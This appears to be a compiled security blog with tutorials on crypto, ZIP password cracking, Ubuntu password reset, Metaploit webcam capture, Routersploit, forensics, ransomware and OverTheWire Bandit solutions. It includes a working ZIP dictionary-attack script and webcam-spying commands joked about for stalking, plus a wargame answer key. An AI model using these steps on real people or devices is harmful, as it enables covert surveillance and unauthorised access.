Bitcoin
Bitcoin is a digital currency created in 2009 by an unknown person or group using the alias Satoshi Nakamoto. Transactions are made without middlemen, meaning no banks. Fees are small compared with card processing (a transaction does carry a miner fee, so "no fees" is not quite right), and there is no need to give your real name. More merchants are beginning to accept it; you can buy web hosting services with it, for example.
Why use Bitcoins?
Bitcoins can be used to buy goods without handing over your identity. Because bitcoin is not tied to any country and, at the time of writing, is largely unregulated, international payments are easy and cheap. There are no credit card fees, so small businesses may like it for that reason. Some people simply buy bitcoins as an investment, hoping they will go up in value.
Buying Bitcoins
Buy on an Exchange
Marketplaces called "bitcoin exchanges" let people buy or sell bitcoins for other currencies. Mt. Gox was for a time the largest exchange; it collapsed in 2014 after hundreds of thousands of customers' bitcoins went missing. That is worth remembering: an exchange holds the private keys for any coins you keep there, so an exchange breach is your loss.
Transfers
People can send bitcoins to each other using mobile apps or their computers. It's similar to sending cash digitally, except that every transfer is written to the public ledger and cannot be reversed.
Mining
People compete to "mine" bitcoins by using computers to solve a difficult hashing puzzle (the proof of work); this is how new bitcoins are created. The miner who first finds a valid block is rewarded with newly created coins, roughly every 10 minutes. The reward started at 50 bitcoins and halves about every four years: it was 25 from late 2012 until July 2016 and 12.5 at the time of writing (2017).
Owning Bitcoins
Bitcoins are stored in a "digital wallet," which exists either in the cloud or on a user's computer. The wallet is a kind of virtual bank account that allows users to send or receive bitcoins, pay for goods, or save their money. Technically the wallet holds private keys, and whoever has the keys has the coins: lose them and the funds are gone, leak them and they can be stolen. Unlike bank deposits, bitcoin wallets are not insured by the FDIC.
Secrecy
Though every bitcoin transaction is recorded in a public log, the names of buyers and sellers are never revealed, only their wallet addresses. That makes bitcoin pseudonymous rather than anonymous: transactions are linkable, and blockchain analysis can often tie addresses back to a person once they cash out through an exchange that knows their identity. Even so, the lack of a real name on each payment is why it became the currency of choice for buying drugs online and for other illicit activity.
Future in question
No one knows what will become of bitcoin. It is mostly unregulated, but that could change. Governments are concerned about taxation and about their lack of control over the currency.
Tuesday, October 24, 2017
Monday, October 23, 2017
AES & DES
Difference between DES and AES
DES (Data Encryption Standard) and AES (Advanced Encryption Standard) are both symmetric block ciphers. AES was introduced to overcome the drawbacks of DES. DES has a small key, which makes it brute-forceable; Triple DES was introduced to work around that, but it is slow. Hence AES was later standardised by the National Institute of Standards and Technology (NIST). The basic structural difference is that DES splits each plaintext block into two halves before the main algorithm starts (a Feistel network), whereas AES processes the entire block as a single 4x4 byte state.
DES (Data Encryption Standard): a symmetric-key block cipher adopted as a US federal standard in 1977 (by NBS, the agency later renamed NIST). DES is based on the Feistel structure, where the plaintext is divided into two halves. DES takes a 64-bit plaintext block and a 56-bit key (carried in 64 bits, 8 of which are parity bits) and produces a 64-bit ciphertext block. A 56-bit key has been brute-forceable with dedicated hardware since 1998.
AES (Advanced Encryption Standard): also a symmetric-key block cipher, published by NIST in 2001 after a public competition (the winning design was Rijndael). AES replaced DES because the DES key is far too small and the algorithm is comparatively slow in software.
- DES works on 64-bit plaintext blocks. AES works on 128-bit blocks; it is the key, not the block, that can be 128, 192, or 256 bits.
- DES has a 56-bit key. AES keys are 128, 192, or 256 bits.
- In DES the data block is divided into two halves. In AES the entire block is processed as a single 4x4 byte matrix (the "state").
- DES is a Feistel cipher. AES is a substitution-permutation network.
- DES's key is too small to resist brute force. AES's key sizes put brute force out of reach, so it is considered secure.
- DES is comparatively slow (16 rounds of bit-level permutations). AES is faster, especially with hardware support such as AES-NI.
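The "divided into two halves" point is easier to see in code than in prose. The toy cipher below is an added example, not DES and not code from the original post: it keeps DES's 64-bit block, 16 rounds and Feistel layout, but replaces the DES round function and key schedule with keyed hashes (an assumption made for brevity). What it demonstrates is the property that makes the Feistel structure attractive: the round function F can be anything, even non-invertible, and decryption is the same routine with the subkeys reversed. The last helper shows why DES is a 56-bit cipher even though its key is written as 8 bytes.

```python
import hashlib
import hmac
import struct

ROUNDS = 16
BLOCK_BYTES = 8  # 64-bit block, as in DES

def round_function(half: int, subkey: bytes) -> int:
    """The Feistel 'F' function on the 32-bit right half. DES uses expansion,
    S-boxes and a permutation; this toy uses an HMAC truncated to 32 bits
    (assumption for brevity). F does not need to be invertible."""
    digest = hmac.new(subkey, struct.pack(">I", half), hashlib.sha256).digest()
    return struct.unpack(">I", digest[:4])[0]

def key_schedule(key: bytes) -> list:
    """One subkey per round. DES rotates and permutes the 56 key bits;
    here each subkey is a hash of the key and the round number."""
    return [hashlib.sha256(key + bytes([r])).digest()[:16] for r in range(ROUNDS)]

def feistel(block: bytes, subkeys: list) -> bytes:
    """Split the block into halves, then per round:
        (L, R) -> (R, L xor F(R, k_r))
    The final swap is undone, as in DES, so that running this same function
    with the subkeys in reverse order inverts it."""
    left, right = struct.unpack(">II", block)
    for k in subkeys:
        left, right = right, left ^ round_function(right, k)
    return struct.pack(">II", right, left)

def encrypt_block(block: bytes, key: bytes) -> bytes:
    return feistel(block, key_schedule(key))

def decrypt_block(block: bytes, key: bytes) -> bytes:
    return feistel(block, key_schedule(key)[::-1])

def des_effective_key(key8: bytes) -> int:
    """DES keys are 64 bits on the wire but only 56 are used: the low bit of
    each byte is an odd-parity bit. Strip them to get the real keyspace."""
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits

if __name__ == "__main__":
    key = bytes.fromhex("133457799bbcdff1")   # the classic DES textbook key
    plaintext = b"Now is t"                   # exactly one 8-byte block
    ciphertext = encrypt_block(plaintext, key)
    print("ciphertext:", ciphertext.hex())
    print("round trip :", decrypt_block(ciphertext, key) == plaintext)
    print("usable key bits:", des_effective_key(key).bit_length())
```

AES has no such halves: its 128-bit block becomes a 4x4 byte state that every round transforms in full (SubBytes, ShiftRows, MixColumns, AddRoundKey), and decryption needs the inverse of each of those steps rather than just reversed subkeys.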
Crack a Password protected ZIP file using KALI LINUX
First, copy the password-protected ZIP file into your Kali environment.
Then type the following commands (shown in the screenshot):
In the screenshot, "zipcracker" is the folder that contains the ZIP file I want to crack and a text file containing a large number of candidate words. We are going to run a dictionary attack: every word in the list is tried as the password until one decrypts the archive.
"crack.zip" is the file I want to crack, and dictionary.text is the word list.
Now you have the password. :)
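To see what the dictionary attack is actually doing, here is an added example (not code from the original post, and not the tool used in the screenshot) that builds a small archive protected with the legacy ZIP cipher ("ZipCrypto", the traditional PKWARE scheme) and then runs a word list against it with nothing but the Python standard library. The archive builder is a minimal single-entry, stored (uncompressed) ZIP written by hand; the entry name, contents and word list are constructed test data.

```python
import io
import os
import struct
import zipfile
import zlib

# --- traditional PKWARE ("ZipCrypto") stream cipher -------------------------

def _crc_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table

_CRC = _crc_table()

def _crc_update(crc, byte):
    return _CRC[(crc ^ byte) & 0xFF] ^ (crc >> 8)

class ZipCrypto:
    """Key state of the legacy ZIP cipher: three 32-bit registers seeded
    with constants and stirred by the password, then by each plaintext byte."""
    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in password:
            self._update(c)

    def _update(self, c):
        self.k0 = _crc_update(self.k0, c)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc_update(self.k2, self.k1 >> 24)

    def _keystream_byte(self):
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plaintext: bytes) -> bytes:
        out = bytearray()
        for c in plaintext:
            out.append(c ^ self._keystream_byte())
            self._update(c)  # the keys advance on the PLAINTEXT byte
        return bytes(out)

# --- a single-entry, stored, password-protected archive ------------------------

def build_encrypted_zip(name: str, data: bytes, password: bytes) -> bytes:
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes plus one check byte (high byte
    # of the CRC). An unzipper decrypts only this header to reject a wrong
    # password quickly, which is also what makes guessing cheap for an attacker.
    header = os.urandom(11) + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(header + data)
    fname = name.encode("ascii")
    flags, method = 0x0001, 0            # bit 0 = encrypted; 0 = stored
    dos_time, dos_date = 0, (37 << 9) | (10 << 5) | 24   # 2017-10-24
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dos_time,
                        dos_date, crc, len(body), len(data), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method,
                          dos_time, dos_date, crc, len(body), len(data),
                          len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1,
                       len(central), len(local) + len(body), 0)
    return local + body + central + eocd

# --- the dictionary attack -------------------------------------------------------

def dictionary_attack(zip_bytes: bytes, wordlist):
    """Try each candidate. zipfile rejects most wrong passwords on the header
    check byte (RuntimeError) and the rare 1-in-256 survivors on the CRC of
    the decrypted data (BadZipFile), so both signals are caught."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        member = zf.namelist()[0]
        for word in wordlist:
            try:
                zf.read(member, pwd=word.encode())
                return word
            except (RuntimeError, zipfile.BadZipFile):
                continue
    return None

if __name__ == "__main__":
    archive = build_encrypted_zip("flag.txt", b"constructed secret contents\n" * 4, b"s3cret")
    words = ["123456", "password", "letmein", "s3cret", "qwerty"]   # constructed word list
    print("recovered password:", dictionary_attack(archive, words))
```

Two practical notes. A dictionary attack only succeeds if the password is in the list, so a long random password defeats it outright; but ZipCrypto itself is broken regardless of password strength (a known-plaintext attack by Biham and Kocher recovers the keys from a few hundred bytes of plaintext), so for anything that matters use an archive format with AES-256 such as 7-Zip or WinZip AE-2. Second, on a real archive the compression method will usually be DEFLATE rather than stored; the stdlib handles that transparently, and the attack loop above is unchanged.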
How to mount a pen drive in VirtualBox using commands
- First, boot the ISO image you want to use with the pen drive in VirtualBox.
- Then plug the pen drive into your personal computer.
- In the VM window, go to the "Devices" menu, then "USB", and select your pen drive from the list.
Then, in the terminal, type the following commands exactly as shown:
Here, "sdd1" is my pen drive's device name. It can change every time you attach the drive, so check which device node was assigned (for example with lsblk or dmesg) before mounting.
Then make a directory called "usbstick" inside the "media" directory.
Then type the following command:
* Make sure your pen drive is formatted as FAT32 (or pass the correct filesystem type to mount).
Now your pen drive has been mounted. :)
Monday, October 2, 2017
How To Recover Lost Ubuntu Password
Let's see step by step how to reset (or, from an attacker's point of view, hack) an Ubuntu password.
Step 1:
Switch the computer on and go to the GRUB menu. Generally it appears automatically; if not, hold down the Shift key until the boot menu appears. In the GRUB menu, choose the "recovery mode" option.
It will bring you a black screen with several lines of output displayed in a flash. Wait a few seconds here.
Step 2:
Now you will be presented with the different options of recovery mode. Here you need to choose "root  Drop to root shell prompt", like in the picture below:
Step 3:
Here you are given root access without being prompted for any password. (Why? Is this not a security fault? It is a deliberate trade-off: anyone with physical access to an unencrypted disk could pull the drive and edit /etc/shadow anyway, so the recovery shell adds little. If this matters to you, set a GRUB password and use full-disk encryption, which closes both routes.) Use the following command to list all the users available:
ls /home
From the output choose the "username" whose password you want to reset. Now use the following command to reset the password for the selected "username":
passwd username
It prompts for a new password. Enter the new password twice:
Enter new UNIX password:
Retype new UNIX password:
Voilà! There you go. You have just reset it and can now log in to the system.
Possible troubleshoot:
While entering the new password you might be prompted with an "Authentication token manipulation error" like this:
passwd username
Enter new UNIX password:
Retype new UNIX password:
passwd: Authentication token manipulation error
passwd: password unchanged
The reason for this error is that the root filesystem is mounted read-only. Remount it read-write like this (the remount and rw flags both go in the -o list):
mount -o remount,rw /
Now try to reset the password again. It should work.
Sunday, October 1, 2017
Hack a web cam using KALI LINUX
This guide continues to demonstrate the abilities of Metasploit's Meterpreter, this time by accessing the victim's webcam. This lets us control the webcam remotely and capture snapshots from it.
Why exactly would you want to hack into somebody's webcam? Maybe you suspect your significant other of having a fling. Or maybe you're into blackmail. Or maybe you're just a creep. But the real purpose is to show just how easy it is, so you're aware that it can be done and can protect yourself against it. (Doing this to a machine you do not own, or have no written permission to test, is a crime in most jurisdictions.)
Unlike a plain command shell on the victim's computer, Meterpreter can do a nearly unlimited number of things on the target. The key is to get Meterpreter running on their system first.
I've shown how to do this in some of my previous articles, where you get the victim to click a link to our malicious website, open a malicious Microsoft Office document or Adobe Acrobat file, and so on.
So, let's fire up Metasploit and get a Meterpreter session on the victim's system. Once we have that, we can view and capture images from their webcam.
Step 1 -> List the Victim's Webcams
Metasploit's Meterpreter has a built-in extension for controlling the remote system's webcam. The first thing we need to do is check whether there is a webcam at all, and if so, get its index and name. We can do that by typing:
meterpreter > webcam_list
If the target has a webcam, the session will come back with a list of all the webcams.
Step 2 -> Snap
Pictures from the Victim's Webcam
Now that we know the target has a webcam, we can take a snapshot from it by typing:
meterpreter > webcam_snap
This saves a snapshot from the webcam onto our system (Metasploit prints the path; on the old Metasploit 3 install used here it landed under /opt/framework3/msf3, while newer versions write a .jpeg into the current working directory unless you pass -p), which we can open to see what's going on.
The quality of the saved image depends entirely on the victim's webcam and surroundings.
Step 3 -> Watch
Streaming Video from the Victim's Webcam
Now that we know how to capture a single snapshot, we want to run the webcam continuously so we can watch a video stream. We can do this by typing:
meterpreter > run webcam -p /var/www
This command starts the webcam and writes its streaming output to /var/www/webcam.htm, which you can open in a browser. (The webcam script belongs to the older Metasploit releases this post was written against; newer versions expose the same function as the webcam_stream command.)
How to Protect
Yourself from Webcam Intrusion
So what can you do to make sure no one is peeking at your habits in front of the computer? The easiest solution: cover your webcam. Some laptops with built-in webcams actually have a slide cover you can use. If not, a piece of opaque tape will do the trick, unless you want to buy a purpose-made cover. And if you still have one of those old-school USB webcams, simply unplug it. Bear in mind that covering the lens does not stop the microphone and does nothing about the Meterpreter session itself; the real fix is not opening untrusted attachments and keeping the machine patched.
Recover your files using "Autopsy"
Extracting files, and recovering critical forensic information generally, is a key part of the computer forensics process. There are a plethora of tools a forensic examiner may choose for the job. Although this document is written from a forensic standpoint, the same technique can be used by anyone who has lost data and wants to try their hand at recovering it. The focus here is Autopsy and how to use that free tool to recover deleted files.
Before we start we need to download a few files. They are free and give you the basics needed to pull files out of a forensic image. Be aware that we also mount the image with other software, to show you that the deleted files really are still on the disk we are analysing.
Should you wish to follow the process from start to finish, you will want: PassMark OSFMount, which is used to mount the .img files obtained in the companion document Obtain Disk Image With Linux; a copy of Autopsy; and ProDiscover. Although this example uses Autopsy, a separate write-up covers the same recovery with ProDiscover.
Once you've downloaded the tools and completed Obtaining Disk Image With Linux, the next step is to mount the drives and analyse them. First load the image in your forensic software of choice; for this example we use Autopsy, and other documents cover recovering files with ProDiscover.
Loading up Autopsy
The first thing we do is create a new case. For this demonstration we select the options shown below:
Once you select this option, fill out some basic information about your "case" (as expected). The following images guide you through this process.
(Autopsy Start Segment)
Once the introduction screens are filled out, the next step is to select what will be loaded. There are a few things to be aware of here. First, whether you are working from an image (as we are) or another kind of disk: in our case we selected "Image File" and then opened the image. Second, the time zone: because we are in EDT, we select that so the timestamps reflect the drive image's zone. (Time zone issues between GMT and Windows will be covered in a separate paper.) Below are the settings we used to load and mount the disk.
(Selecting a disk image to analyze)
From this point we select the sources and the information we want to look for. Once that is done we can look into the status of the case or start recovering files.
(Selecting options and settings to utilize for the forensics)
After this point you can click "Finish" and let the software load the information you selected. You will notice a progress bar in the bottom right of the screen. Let it finish, and then you can begin to analyse the disk.
(The loading bar for the images selected)
Mounting & Viewing Drives
Once the information has been loaded, we can look at what the application offers. For simplicity we also view the files outside the forensic application first, to give you an idea of which files are there forensically versus what appears to the naked eye. If you skipped the beginning of this document: you need PassMark OSFMount to play along. Note that OSFMount mounts the drive read-only. You cannot interact with the files beyond opening and reviewing them; saving, deleting or modifying them is not possible in this view, which is exactly what you want when handling evidence.
To mount the image, install and start the software. Note that you need administrative privileges to mount a disk. The following screenshot shows how to mount the image file.
(Default load screen for OSFmount)
From these options select "Mount New", then follow the example in the image below.
(Steps to mount an image file)
Once you've selected your image and clicked "OK", the drive shows up in Explorer on the left side, as in the following image:
(Forensic Image as a Disk)
As the image above shows, the disk image has been mounted as a read-only drive and we can browse it.
(Combining both views from explorer and Autopsy)
In the image above, the view on the left is from within Autopsy, while the standard view is from Windows Explorer. We can clearly see that files are missing. What is up with that? The files marked with red X's are files that have been deleted. Deleting a file only removes its directory entry and marks its blocks as free space waiting to be overwritten; the contents stay on disk until that happens. In the Windows Explorer view those names are simply gone. So things aren't what they appear to be, and the less you write to a disk after a deletion, the more you can recover.
Autopsy View
The Autopsy window is split into panes and is not difficult to follow. The view below shows what the software looks like and where to find the drive you've attached. Select your drive (top left, circled in red), click the + to expand the files and folders under its root, and the centre pane lists the files, folders and other information that was, or still is, on the drive. From there you can begin to scrutinise the disk and its contents.
(Autopsy software and it's main window)
Extracting Deleted Files
Forensic examiners (as well as people looking to retrieve their own deleted files) will normally attempt to recover deleted files from a forensic image in order to see what is inside them, and to determine whether they are in fact evidence that may impact a case. To recover files in Autopsy, select a file with a red X and right-click it. In this case we extract the folder "admenot" and "mainbanner.png".
Some files may yield nothing beyond the fact that a file of that name once existed on the disk, but you can also extract deleted directories with their entire contents. This is a very limited example, but it shows how an examiner would go about extracting deleted information. One thing to point out: not all files keep their original names. In a forensic investigation, looking at every value, file and folder, including those with cryptic recovered names, may yield information.
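Autopsy finds "mainbanner.png" by following filesystem metadata that still points at the freed blocks. When even that metadata is gone, the fallback is carving: scanning the raw image for file signatures and walking the file's own structure to find its end. The example below is added here to show that second technique on a PNG; it is not code from the original post or from Autopsy. The disk image is a constructed 64 KiB buffer with one intact deleted PNG, one PNG whose tail was overwritten, and an unrelated text file, so you can see both the hit and the reason a damaged file is skipped.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def make_png(width: int, height: int, rgb=(200, 30, 30)) -> bytes:
    """Build a small valid PNG in memory (constructed test data)."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB
    raw = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")

def walk_png(buf: bytes, start: int):
    """Follow the chunk chain from a signature at `start`. Return the offset
    just past IEND if every chunk CRC checks out, else None. The CRCs are
    what tell a truncated or partly overwritten file from an intact one."""
    pos = start + len(PNG_SIG)
    while pos + 8 <= len(buf):
        length, ctype = struct.unpack(">I4s", buf[pos:pos + 8])
        body_end = pos + 8 + length
        if body_end + 4 > len(buf):
            return None
        body = buf[pos + 8:body_end]
        crc = struct.unpack(">I", buf[body_end:body_end + 4])[0]
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return None
        pos = body_end + 4
        if ctype == b"IEND":
            return pos
    return None

def carve_pngs(image: bytes):
    """Scan a raw disk image for PNG signatures, ignoring the filesystem
    entirely, the way a carver recovers files whose directory entry is gone.
    Returns [(offset, png_bytes), ...] for every intact hit."""
    found = []
    pos = image.find(PNG_SIG)
    while pos != -1:
        end = walk_png(image, pos)
        if end is not None:
            found.append((pos, image[pos:end]))
            pos = image.find(PNG_SIG, end)
        else:
            pos = image.find(PNG_SIG, pos + 1)
    return found

def constructed_disk_image():
    """Fake 64 KiB partition: one deleted-but-intact PNG, one PNG whose tail
    sectors were reused, and a live text file. No filesystem structures."""
    sector = 512
    img = bytearray(128 * sector)
    good = make_png(4, 4)
    img[10 * sector:10 * sector + len(good)] = good
    damaged = make_png(8, 8)[:-6]            # IEND chunk partly overwritten
    img[40 * sector:40 * sector + len(damaged)] = damaged
    note = b"Shopping list: milk, eggs\n"
    img[70 * sector:70 * sector + len(note)] = note
    return bytes(img), good

if __name__ == "__main__":
    image, _ = constructed_disk_image()
    for offset, data in carve_pngs(image):
        print(f"intact PNG at byte {offset} (sector {offset // 512}), {len(data)} bytes")
```

Production carvers (Scalpel, PhotoRec, Autopsy's own carving module) do the same signature scan but also recover partial files and handle fragmented ones; the strict CRC walk here is deliberately conservative so that what it returns is known to be intact, which matters when the output may become evidence.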
Secure your password!
How to secure your passwords?
Why is a "password" required on a site? Because we have to protect it from unauthorised access; simply put, we should protect our profile or site from outsiders. Some of you know the reason, but most people keep their passwords safe only because they see other people do it, or because of what the word "password" implies. Most people don't know how to protect their passwords. After reading this post you should have some idea.
There are many ways to do this, but some are more effective than others.
1. Two factor authentication / Two-step verification
This is the best single improvement you can make. Two-factor authentication means that instead of one means of authentication, the user presents two means of different kinds.
What are these kinds (factors) of authentication?
Knowledge - something the user knows, e.g. a password or PIN.
Possession - something the user has, e.g. a phone that receives a code, a hardware token, an ID card.
Inherence - something the user is or does, e.g. fingerprint, voice recognition, iris scan.
Two factors of the same kind (two passwords) do not count; the factors have to be different so that one attack does not capture both.
The advantage of two-factor authentication is that even if an attacker learns the password for an account, he still cannot get in: he has to obtain the second factor as well. Facebook, Gmail and most other social media and services offer it. Prefer an authenticator app or hardware key over SMS codes, which can be intercepted by SIM swapping.
2. Combine lower case, upper case, digits and symbols
Passwords are vulnerable to brute-force and dictionary attacks. If you only use upper case or lower case letters, the search space is small and it is easy for an attacker to break your password.
3. Use a password of at least 8 characters (longer is better)
As the password length increases, the number of possible combinations grows exponentially. With a huge number of combinations, breaking the password takes a huge amount of time and computing power, which puts it out of reach for most attackers. Eight characters is a floor, not a target: a passphrase of several random words is both longer and easier to remember.
4. Avoid single dictionary words
Solitary means existing alone. That means do not use a word that exists in any language on its own: word lists are the first thing an attacker tries.
5. Do not use names of people, places, things, and characters
6. Do not write down passwords where others can read them
Since people do not like memorising passwords, they tend to write them on paper. Sometimes they write credentials on a sticky note and stick it on the monitor at work. If that is the case, why have a password at all? Anyone could use anyone's device or account. Use a password manager instead, so each site gets a unique random password you never have to remember.
7. Always log out of devices and accounts once you are done. Otherwise workstation hijacking can occur.
Thursday, September 14, 2017
How to Hack a Router using "Routersploit"
Hacking a router is serious: an attacker who controls the router controls the whole network. Even today some routers are vulnerable to remote authentication bypasses and ship with default credentials. You can find and exploit such vulnerabilities with "Routersploit" on Kali Linux. Only run this against routers you own or are authorised to test.
Now we'll see how to run a simple scan and exploit against your router.
1) Download the "Routersploit" toolkit, then change into its directory (here I downloaded it to my desktop).
2) Then type ./rsf.py
3) Next, give the command "show scanners".
You'll see a long list of scanners.
4) Use the command "use scanners/autopwn" and then "show options".
It will display the target options as follows:
5) Set the target and type the command "run". Exploitable vulnerabilities are marked with a green plus (+).
6) Then do the rest as follows:
Now you can try it. ;) Thanks!
Tuesday, August 8, 2017
Ransomware
Ransomware: what is it?
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the screen or by encrypting the users' files, until a ransom is paid.
Ransomware can spread through malicious e-mail attachments, infected software, infected external storage devices and compromised websites. In a lock-screen attack the malware may change the victim's login credentials; in a data-kidnapping (crypto-ransomware) attack it encrypts files on the infected device as well as on connected network shares.
How does it happen?
In most cases it starts with clicking the wrong link or downloading the wrong file or program: attackers hide malicious code in the file and distribute it. Once it runs, it encrypts your files. Typically each file is encrypted with a fresh symmetric key, and that key is in turn encrypted with the attacker's public key; the matching private key, which only the attacker holds, is what you are asked to pay for.
After the attack the victim receives a pop-up message or e-mail warning that if the ransom is not paid by a certain date, the private key required to unlock the device or decrypt the files will be destroyed. The only reliable defence is an offline or versioned backup that the malware cannot reach.
These days ransomware doesn't just affect desktops and laptops; it also targets mobile phones.
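One practical consequence of the encryption described above is detectable: a text file that an encryptor has rewritten in place stops looking like text and starts looking like random bytes, and many families also bolt a new extension onto the name. The example below is added here (not code from the original post or from any product) to show that heuristic as a defender would run it over a file tree. The file set, the extension list and the "ciphertext" (a deterministic SHA-256 counter stream standing in for encrypted output) are all constructed.

```python
import hashlib
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant file, approaching 8.0 for uniform
    random bytes. Encrypted output sits near 8; English text near 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

# Constructed lists: real campaigns use many more extensions, so in production
# feed both sets from threat intel rather than hard-coding them.
RANSOM_EXTENSIONS = {".locked", ".encrypted", ".crypt", ".enc"}
TEXT_EXTENSIONS = {".txt", ".csv", ".log", ".ini", ".sql", ".md"}

def looks_encrypted(name: str, data: bytes, threshold: float = 7.5) -> bool:
    """Flag a file if it carries a known ransom extension, or if a file that
    should be plain text has near-random contents. Only text-like types are
    judged by entropy: .docx, .jpg and .zip are compressed and legitimately
    score near 8, so an entropy rule on them would be pure noise."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext in RANSOM_EXTENSIONS:
        return True
    return ext in TEXT_EXTENSIONS and shannon_entropy(data) >= threshold

def scan(files: dict, threshold: float = 7.5) -> list:
    """files maps name -> bytes (what a tree walk would yield). Returns the
    sorted names that trip the heuristic."""
    return sorted(name for name, data in files.items() if looks_encrypted(name, data, threshold))

def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for ciphertext so the demo is reproducible."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
        i += 1
    return bytes(out[:n])

def constructed_sample() -> dict:
    return {
        "report.txt": b"Quarterly revenue rose 4% on stronger demand.\n" * 200,
        "notes.txt": pseudo_random_bytes(8192),          # rewritten in place by an encryptor
        "photo.jpg.locked": pseudo_random_bytes(8192),   # renamed with a ransom extension
        "server.log": b"2017-08-08 10:00:01 INFO service started\n" * 200,
    }

if __name__ == "__main__":
    for name, data in constructed_sample().items():
        print(f"{name:18s} entropy={shannon_entropy(data):.2f} flagged={looks_encrypted(name, data)}")
```

On its own this is a per-file signal; what turns it into an alert is the rate: hundreds of such rewrites from one process in a few seconds is the pattern an endpoint product keys on, and the point at which you want that process killed and the host isolated.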
OverTheWire - "Bandit" Solutions :)
Bandit is one of the famous wargames. It is aimed at beginners and teaches the basics needed to play other wargames. Note that OverTheWire changes the level passwords from time to time, so the ones recorded below are the ones that were current when this was written; work through each level yourself rather than copying them.
And what is a Wargame?
In hacking, a wargame (or war game) is a cyber-security challenge and mind sport in which competitors must exploit or defend a vulnerability in a system or application, or gain or prevent access to a computer system.
Now let's see how to play this game.
First you have to set up a platform to play on. You can use Linux/Unix or Windows.
If you are using Linux/Unix, follow these steps first:
- Open a terminal
- Type ssh <Level Number>@bandit.labs.overthewire.org -p 2220 and then enter <the password you have found>. E.g.: ssh bandit0@bandit.labs.overthewire.org -p 2220
- Once you have found the password for the next level, use the 'exit' command to disconnect from the server.
- Reconnect to the server as the next user to go to the next level.
If you are using Windows, follow these steps:
1. Download "PuTTY" from this link -> https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Make sure to download the "putty.exe (the SSH and Telnet client itself)" file.
2. Open PuTTY and set the host name and port
3. Once the terminal opens, provide the username and password
4. After you have found the password for the next level, restart PuTTY and log in as the next level's user
Let's begin the War!!! :)
Level 0
Log in with username 'bandit0' and password 'bandit0'.
Then read the password from the file readme in the home directory. The password in that file is for the bandit1 user, i.e. the next level.
bandit0@melinda:~$ ls -lh
readme
bandit0@melinda:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1 <-- Password for the next level
Level 0 -> 1
Log in with username 'bandit1' and password 'boJ9jbbUNNfktd78OOpsqOltutMc3MY1'.
The password is in a file called "-". A bare "-" is read by cat as "standard input", so we give it a path (./-) instead.
bandit1@melissa:~$ ls
-
bandit1@melissa:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9 <-- Password for the next level
Level 1 -> 2
Log in with username 'bandit2' and password 'CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9'.
This time we simply need to read a file with spaces in its name. Surround the file name in quotes.
bandit2@melissa:~$ ls
spaces in this filename
bandit2@melissa:~$ cat "spaces in this filename"
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK <-- Password for the next level
Level 2 -> 3
Log in with username 'bandit3' and password 'UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK'.
The password is in a hidden (dot) file in the inhere directory; ls -a shows it.
bandit3@melissa:~$ ls
inhere
bandit3@melissa:~$ cd inhere
bandit3@melissa:~/inhere$ ls -la
total 12
drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit4 bandit3 33 2012-05-10 23:51 .hidden
bandit3@melissa:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB <-- Password for the next level
Level 3 -> 4
Log in with username 'bandit4' and password 'pIwrPrtPN36QITSp3EQaw936yaFoFgAB'.
We are told the password is somewhere in the inhere directory and is the only human-readable file there. Let's see what file types we have. The names start with a dash, so we pass ./-* rather than -*, otherwise file would treat them as options.
bandit4@melissa:~$ ls
inhere
bandit4@melissa:~$ cd inhere
bandit4@melissa:~/inhere$ ls -la
total 48
drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file00
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file01
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file02
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file03
-rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file04
